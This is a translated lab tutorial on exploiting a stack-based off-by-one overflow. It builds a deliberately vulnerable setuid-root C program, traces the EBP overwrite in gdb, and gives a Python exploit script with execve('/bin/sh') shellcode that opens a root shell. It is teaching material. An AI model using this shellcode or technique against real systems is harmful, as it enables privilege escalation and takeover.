Off-By-One Vulnerability (Stack Based) - ApacheCN Network Security Translation Collection

Translator: hackyzh

Original: Off-By-One Vulnerability (Stack Based)

VM setup: Ubuntu 12.04 (x86)

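What is an off-by-one?

Copying a source string into a destination buffer can result in an off-by-one when:

1. The source string length is equal to the destination buffer length.

When the source string length equals the destination buffer length, a single NULL byte is written just above the destination buffer. Because the destination buffer lives on the stack, that single NULL byte can overwrite the least significant byte (LSB) of the caller's EBP stored on the stack, which can lead to arbitrary code execution.

Enough of definitions, as always; let's look at some off-by-one vulnerable code!

Vulnerable code: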

//vuln.c
#include <stdio.h>
#include <string.h>
void foo(char* arg);
void bar(char* arg);
void foo(char* arg) {
 bar(arg); /* [1] */
}
void bar(char* arg) {
 char buf[256];
 strcpy(buf, arg); /* [2] */
}
int main(int argc, char *argv[]) {
 if(strlen(argv[1])>256) { /* [3] */
  printf("Attempted Buffer Overflow\n");
  fflush(stdout);
  return -1;
 }
 foo(argv[1]); /* [4] */
 return 0;
}

Compilation commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

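Line [2] of the vulnerable code above is where the off-by-one overflow can occur. The check at line [3] only rejects inputs longer than 256 bytes, and the destination buffer is 256 bytes long, so a source string of exactly 256 bytes passes the check and can lead to arbitrary code execution.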
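To make the bug concrete, here is a minimal Python 3 sketch that models the check at [3] and the copy at [2] on a flat byte array. The helper names passes_check and simulated_strcpy, the frame layout (saved EBP immediately after buf), and the sample saved EBP value 0xbffff2d8 are illustrative assumptions and are not part of vuln.c.

```python
import struct

BUF_SIZE = 256

def passes_check(arg: bytes) -> bool:
    """Mirror of the test at [3]: only inputs longer than 256 bytes are rejected."""
    return not (len(arg) > BUF_SIZE)

def simulated_strcpy(frame: bytearray, arg: bytes) -> None:
    """Copy arg plus its terminating NUL to the start of frame, like strcpy."""
    data = arg + b"\x00"
    frame[0:len(data)] = data

# Hypothetical frame: 256 bytes of buf followed by the caller's saved EBP
# (little-endian, as on x86). The EBP value is only an example.
frame = bytearray(BUF_SIZE) + bytearray(struct.pack("<I", 0xBFFFF2D8))

arg = b"A" * 256
assert passes_check(arg)            # 256 is not > 256, so the check passes
simulated_strcpy(frame, arg)        # writes 257 bytes: 256 'A's plus the NUL

saved_ebp = struct.unpack("<I", frame[BUF_SIZE:BUF_SIZE + 4])[0]
print(hex(saved_ebp))               # 0xbffff200: only the low byte changed
```

Only one byte beyond buf is touched, which is why the upper three bytes of the saved EBP survive.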

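How is arbitrary code execution achieved?

Arbitrary code execution is achieved using a technique called "EBP overwrite". If the caller's EBP is located just above the destination buffer, then after strcpy a single NULL byte overwrites the LSB of the caller's EBP. To understand off-by-one better, let's disassemble the vulnerable code and draw its stack layout.

Disassembly: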

 (gdb) disassemble main
Dump of assembler code for function main:
 //Function Prologue
 0x08048497 <+0>: push %ebp                    //backup caller's ebp
 0x08048498 <+1>: mov %esp,%ebp                //set callee's (main) ebp to esp
 0x0804849a <+3>: push %edi                    //backup EDI
 0x0804849b <+4>: sub $0x8,%esp                //create stack space
 0x0804849e <+7>: mov 0xc(%ebp),%eax           //eax = argv
 0x080484a1 <+10>: add $0x4,%eax               //eax = &argv[1]
 0x080484a4 <+13>: mov (%eax),%eax             //eax = argv[1]
 0x080484a6 <+15>: movl $0xffffffff,-0x8(%ebp) //String Length Calculation -- Begins here
 0x080484ad <+22>: mov %eax,%edx
 0x080484af <+24>: mov $0x0,%eax
 0x080484b4 <+29>: mov -0x8(%ebp),%ecx
 0x080484b7 <+32>: mov %edx,%edi
 0x080484b9 <+34>: repnz scas %es:(%edi),%al
 0x080484bb <+36>: mov %ecx,%eax
 0x080484bd <+38>: not %eax
 0x080484bf <+40>: sub $0x1,%eax               //String Length Calculation -- Ends here
 0x080484c2 <+43>: cmp $0x100,%eax             //eax = strlen(argv[1]). if eax > 256
 0x080484c7 <+48>: jbe 0x80484e9 <main+82>     //Jmp if NOT greater
 0x080484c9 <+50>: movl $0x80485e0,(%esp)      //If greater print error string,flush and return.
 0x080484d0 <+57>: call 0x8048380 <puts@plt>   
 0x080484d5 <+62>: mov 0x804a020,%eax          
 0x080484da <+67>: mov %eax,(%esp)             
 0x080484dd <+70>: call 0x8048360 <fflush@plt>
 0x080484e2 <+75>: mov $0x1,%eax              
 0x080484e7 <+80>: jmp 0x80484fe <main+103>
 0x080484e9 <+82>: mov 0xc(%ebp),%eax          //strlen(argv[1]) <= 256, eax = argv
 0x080484ec <+85>: add $0x4,%eax               //eax = &argv[1]
 0x080484ef <+88>: mov (%eax),%eax             //eax = argv[1]
 0x080484f1 <+90>: mov %eax,(%esp)             //foo arg
 0x080484f4 <+93>: call 0x8048464              //call foo
 0x080484f9 <+98>: mov $0x0,%eax               //return value

 //Function Epilogue
 0x080484fe <+103>: add $0x8,%esp              //unwind stack space
 0x08048501 <+106>: pop %edi                   //restore EDI
 0x08048502 <+107>: pop %ebp                   //restore EBP
 0x08048503 <+108>: ret                        //return
End of assembler dump.
(gdb) disassemble foo
Dump of assembler code for function foo:
 //Function prologue
 0x08048464 <+0>: push %ebp                    //backup caller's (main) ebp
 0x08048465 <+1>: mov %esp,%ebp                //set callee's (foo) ebp to esp
 0x08048467 <+3>: sub $0x4,%esp                //create stack space
 0x0804846a <+6>: mov 0x8(%ebp),%eax           //foo arg
 0x0804846d <+9>: mov %eax,(%esp)              //bar arg = foo arg
 0x08048470 <+12>: call 0x8048477              //call bar

 //Function Epilogue 
 0x08048475 <+17>: leave                       //unwind stack space + restore ebp
 0x08048476 <+18>: ret                         //return
End of assembler dump.
(gdb) disassemble bar
Dump of assembler code for function bar:
 //Function Prologue
 0x08048477 <+0>: push %ebp                    //backup caller's (foo) ebp
 0x08048478 <+1>: mov %esp,%ebp                //set callee's (bar) ebp to esp
 0x0804847a <+3>: sub $0x108,%esp              //create stack space
 0x08048480 <+9>: mov 0x8(%ebp),%eax           //bar arg
 0x08048483 <+12>: mov %eax,0x4(%esp)          //strcpy arg2
 0x08048487 <+16>: lea -0x100(%ebp),%eax       //buf
 0x0804848d <+22>: mov %eax,(%esp)             //strcpy arg1
 0x08048490 <+25>: call 0x8048370 <strcpy@plt> //call strcpy

 //Function Epilogue
 0x08048495 <+30>: leave                       //unwind stack space + restore ebp
 0x08048496 <+31>: ret                         //return
End of assembler dump.
(gdb)

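Stack layout

Off-By-One Vulnerability (Stack Based) - Figure 1

As we already know, a 256-byte user input overwrites the LSB of foo's EBP with a NULL byte. So when foo's EBP, stored just above the destination buffer buf, is hit by that single NULL byte, it changes from 0xbffff2d8 to 0xbffff200. From the stack layout we can see that stack location 0xbffff200 is part of the destination buffer buf. Since user input is copied into this buffer, the attacker controls this stack location (0xbffff200), and through it the instruction pointer (EIP), which he can use to achieve arbitrary code execution. Let's test this by sending a series of 256 "A"s.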
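The address arithmetic in the paragraph above can be checked with a short Python 3 sketch. It assumes buf starts at 0xbffff158, the address this article quotes from its stack layout; the helper name clobber_lsb is hypothetical.

```python
BUF_START = 0xBFFFF158   # address of buf as quoted from the stack layout
BUF_SIZE = 256

def clobber_lsb(ebp: int) -> int:
    """Return ebp with its least significant byte set to zero."""
    return ebp & 0xFFFFFF00

old_ebp = 0xBFFFF2D8
new_ebp = clobber_lsb(old_ebp)

# Does the corrupted EBP point inside the attacker-filled buffer?
inside_buf = BUF_START <= new_ebp < BUF_START + BUF_SIZE
print(hex(new_ebp), inside_buf)   # 0xbffff200 True
```

On a different machine or environment the stack addresses will differ, so the corrupted EBP is not guaranteed to fall inside buf.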

Test step 1: Is EBP overwritten, and can the return address be overwritten as a result?

(gdb) r `python -c 'print "A"*256'`
Starting program: /home/sploitfun/lsploits/new/obo/stack/vuln `python -c 'print "A"*256'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) p/x $eip
$1 = 0x41414141
(gdb)

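The output above shows that we have gained control of the instruction pointer (EIP) through the EBP overwrite.

Test step 2: What is the offset from the destination buffer?

Now let's find the offset, measured from the start of the destination buffer buf, at which we need to place our return address. Remember that in an off-by-one vulnerability we do not overwrite the actual return address stored on the stack (as we do in a stack-based buffer overflow). Instead, a 4-byte memory region inside the attacker-controlled destination buffer buf is treated as the return address location after the off-by-one overflow. So we need to find the offset (from buf) of this return address location, which is itself part of buf. Not very clear yet? No problem, read on!

Now let's follow the CPU's execution starting from text segment address 0x08048490.

0x08048490 - call strcpy - Executing this instruction causes the off-by-one overflow, so foo's EBP value (stored at stack location 0xbffff2cc) changes from 0xbffff2d8 to 0xbffff200.
0x08048495 - leave - The leave instruction unwinds this function's stack space and restores ebp.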

leave: mov %ebp,%esp        //unwind stack space by setting esp to ebp.
       pop %ebp             //restore ebp
*** As per our example: ***
leave: mov %ebp,%esp        //esp = ebp = 0xbffff2cc
       pop %ebp             //ebp = 0xbffff200 (the overwritten EBP value is now in the ebp register); esp = 0xbffff2d0

0x08048496 - ret - Returns to foo's instruction at 0x08048475.
0x08048475 - leave - The leave instruction unwinds this function's stack space and restores ebp.

*** As per our example: ***
leave: mov %ebp,%esp        //esp = ebp = 0xbffff200 (as part of unwinding, esp is shifted down instead of up!!)
       pop %ebp             //ebp = 0x41414141; esp = 0xbffff204

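0x08048476 - ret - Returns to the address stored at ESP (0xbffff204). ESP now points into the attacker-controlled buffer, so the attacker can return to any location of his choosing and achieve arbitrary code execution.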
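The four steps above can be replayed with a toy model of the stack. This is a Python 3 sketch, not an emulator: the Cpu class is hypothetical, memory is a dictionary holding only the four stack slots the walkthrough touches, and the value 0x42424242 at 0xbffff204 is an illustrative stand-in for whatever the attacker placed there.

```python
class Cpu:
    """Tiny model of the esp/ebp/eip registers and a sparse 32-bit stack."""

    def __init__(self, mem, esp, ebp):
        self.mem = mem      # dict: stack address -> 32-bit value
        self.esp = esp
        self.ebp = ebp
        self.eip = None

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value

    def leave(self):
        # leave = mov %ebp,%esp ; pop %ebp
        self.esp = self.ebp
        self.ebp = self.pop()

    def ret(self):
        # ret = pop %eip
        self.eip = self.pop()

mem = {
    0xBFFFF2CC: 0xBFFFF200,  # foo's saved EBP after the NULL byte hit its LSB
    0xBFFFF2D0: 0x08048475,  # bar's return address (inside foo)
    0xBFFFF200: 0x41414141,  # attacker data inside buf
    0xBFFFF204: 0x42424242,  # attacker data inside buf, consumed as a return address
}

# State right after strcpy returns in bar; the initial esp value is irrelevant
# because leave overwrites it.
cpu = Cpu(mem, esp=0xBFFFF1C4, ebp=0xBFFFF2CC)

cpu.leave()   # bar: esp = 0xbffff2d0, ebp = 0xbffff200
cpu.ret()     # bar: eip = 0x08048475
cpu.leave()   # foo: esp = 0xbffff204, ebp = 0x41414141
cpu.ret()     # foo: eip is loaded from the attacker-controlled slot

print(hex(cpu.eip))   # 0x42424242
```

The second leave is the key step: it trusts the corrupted EBP and moves ESP into the buffer, so the following ret pops an attacker-chosen value.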

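Now let's get back to our original task of finding the offset from the destination buffer buf to the return address. As shown in our stack layout figure, buf is located at 0xbffff158, and from the CPU walkthrough we know that the return address location inside buf is at 0xbffff204. The offset from buf to the return address is therefore 0xbffff204 - 0xbffff158 = 0xac (172 in decimal). So user input of the form "A"*172 + "B"*4 + "A"*80 overwrites EIP with BBBB.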
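The offset and the padding sizes follow directly from the two addresses quoted above, as this small Python 3 sketch shows. The constant names are hypothetical; the addresses are the ones given in this article and will differ on other systems.

```python
BUF_START = 0xBFFFF158   # start of buf, from the stack layout
RET_SLOT = 0xBFFFF204    # where ESP points when foo executes ret
BUF_SIZE = 256

offset = RET_SLOT - BUF_START              # bytes of padding before the fake return address
padding_after = BUF_SIZE - offset - 4      # bytes needed to reach exactly 256

payload = b"A" * offset + b"B" * 4 + b"A" * padding_after
print(hex(offset), offset, padding_after, len(payload))   # 0xac 172 80 256
```

The total must stay at exactly 256 bytes: a shorter input does not reach the saved EBP, and a longer one is rejected by the length check.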

$ cat exp_tst.py 
#exp_tst.py
#!/usr/bin/env python
import struct
from subprocess import call

buf = "A" * 172
buf += "B" * 4
buf += "A" * 80

print "Calling vulnerable program"
call(["./vuln", buf])

$ python exp_tst.py 
Calling vulnerable program
$ sudo gdb -q vuln 
Reading symbols from /home/sploitfun/lsploits/new/obo/stack/vuln...(no debugging symbols found)...done.
(gdb) core-file core
[New LWP 4055]
warning: Can't read pathname for load map: Input/output error.
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) p/x $eip
$1 = 0x42424242
(gdb)

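The output above shows that the attacker controls the return address, which is located at offset 0xac from buf. With this information, we can write an exploit program to achieve arbitrary code execution.

Exploit code: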

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

#Spawn a shell. 
#execve(/bin/sh) Size- 28 bytes.
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90"

ret_addr = 0xbffff218

#endianness conversion
def conv(num):
 return struct.pack("<I",num)

#Junk + Return Address + NOP's + Shellcode + Junk
buf = "A" * 172
buf += conv(ret_addr)
buf += "\x90" * 30
buf += scode
buf += "A" * 22

print "Calling vulnerable program"
call(["./vuln", buf])

Running the exploit program above gives us a root shell, as shown below:

$ python exp.py 
Calling vulnerable program
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$
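As a sanity check on the exploit buffer layout, the following Python 3 sketch recomputes the sizes used in exp.py and confirms that ret_addr falls inside the NOP sled. It assumes buf starts at 0xbffff158, as in the stack layout discussed earlier; the constant names are hypothetical, and the numbers are copied from exp.py.

```python
import struct

BUF_START = 0xBFFFF158   # assumed start of buf (from the stack layout)
OFFSET = 172             # padding before the fake return address
RET_ADDR = 0xBFFFF218    # ret_addr from exp.py
NOP_COUNT = 30           # "\x90" * 30
SCODE_LEN = 28           # shellcode size stated in exp.py
JUNK = 22                # trailing "A" * 22

total = OFFSET + 4 + NOP_COUNT + SCODE_LEN + JUNK

sled_start = BUF_START + OFFSET + 4      # first NOP sits right after the return address
sled_end = sled_start + NOP_COUNT        # first shellcode byte
lands_in_sled = sled_start <= RET_ADDR < sled_end

packed = struct.pack("<I", RET_ADDR)     # same conversion as conv() in exp.py

print(total, hex(sled_start), hex(sled_end), lands_in_sled, packed)
```

Landing in the middle of the sled leaves some slack in both directions if the real stack addresses shift by a few bytes.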

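Off-by-one looks like a silly bug, and it is surprising that such a small mistake by a developer can lead to arbitrary code execution. Does an off-by-one always lead to arbitrary code execution?

What if the caller's EBP is not located just above the destination buffer?

The answer is simple: we cannot exploit it using the EBP overwrite technique! (Some other exploitation technique may still be possible, since the bug does exist in the code.)

In which cases is the caller's EBP not located just above the destination buffer?

Case 1: Some other local variable may be located above the destination buffer.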

...
void bar(char* arg) {
 int x = 10; /* [1] */
 char buf[256]; /* [2] */ 
 strcpy(buf, arg); /* [3] */ 
}
...

In such cases, a local variable sits between the end of the buffer buf and EBP, which prevents us from overwriting the LSB of EBP!
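A minimal Python 3 sketch of Case 1, under the assumption that the compiler places x directly between buf and the saved EBP (actual placement depends on the compiler and its options). The frame layout and the saved EBP value are illustrative.

```python
import struct

BUF_SIZE = 256

# Hypothetical frame: buf (256 bytes), then int x = 10, then the saved EBP.
frame = bytearray(BUF_SIZE) + bytearray(struct.pack("<iI", 10, 0xBFFFF2D8))

# strcpy of a 256-byte string writes 256 bytes plus one terminating NUL.
data = b"A" * 256 + b"\x00"
frame[:len(data)] = data

x, saved_ebp = struct.unpack("<iI", frame[BUF_SIZE:])
print(x, hex(saved_ebp))   # 0 0xbffff2d8
```

The stray NULL byte lands in the low byte of x (10 becomes 0), and the saved EBP is left intact.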

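Case 2: Alignment space - By default, gcc aligns stack space to a 16-byte boundary, i.e. before creating stack space it zeroes the last 4 bits of ESP using an and instruction, as shown in the function disassembly below.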

Dump of assembler code for function main:
 0x08048497 <+0>: push %ebp
 0x08048498 <+1>: mov %esp,%ebp
 0x0804849a <+3>: push %edi
 0x0804849b <+4>: and $0xfffffff0,%esp               //Stack space aligned to 16 byte boundary
 0x0804849e <+7>: sub $0x20,%esp                     //create stack space
...

In such cases, an alignment gap (of up to 12 bytes) sits between the end of the buffer buf and EBP, which prevents us from overwriting the LSB of EBP!
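The "up to 12 bytes" figure follows from the and instruction combined with the fact that ESP is always 4-byte aligned at that point. The Python 3 sketch below is a simplified model that looks only at the masking step; the helper name alignment_gap and the sample ESP range are hypothetical.

```python
def alignment_gap(esp: int) -> int:
    """Bytes skipped by `and $0xfffffff0,%esp` for a given ESP value."""
    return esp - (esp & 0xFFFFFFF0)

# ESP is 4-byte aligned after the pushes, so try every 4-byte-aligned value
# across a few 16-byte blocks.
gaps = sorted({alignment_gap(esp) for esp in range(0xBFFFF2C0, 0xBFFFF300, 4)})
print(gaps)   # [0, 4, 8, 12]
```

A gap of 0 is the case raised in the help request at the end of this article: ESP already aligned before the stack space is created.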

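For this reason, we added the gcc argument -mpreferred-stack-boundary=2 when compiling our vulnerable code (vuln.c)!

Help request!!: What if ESP is already aligned on a 16-byte boundary before the stack space is created? In that case, an EBP overwrite should be possible even when the program is compiled with gcc's default 16-byte stack boundary. So far, though, I have not managed to produce working code for this. In all of my attempts ESP was not aligned on a 16-byte boundary before the stack space was created: no matter how carefully I arranged my stack contents, gcc added some extra space for local variables, which left ESP unaligned to the 16-byte boundary. If anyone has working code, or an answer to why ESP is always unaligned, please let me know.

Reference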

http://seclists.org/bugtraq/1998/Oct/109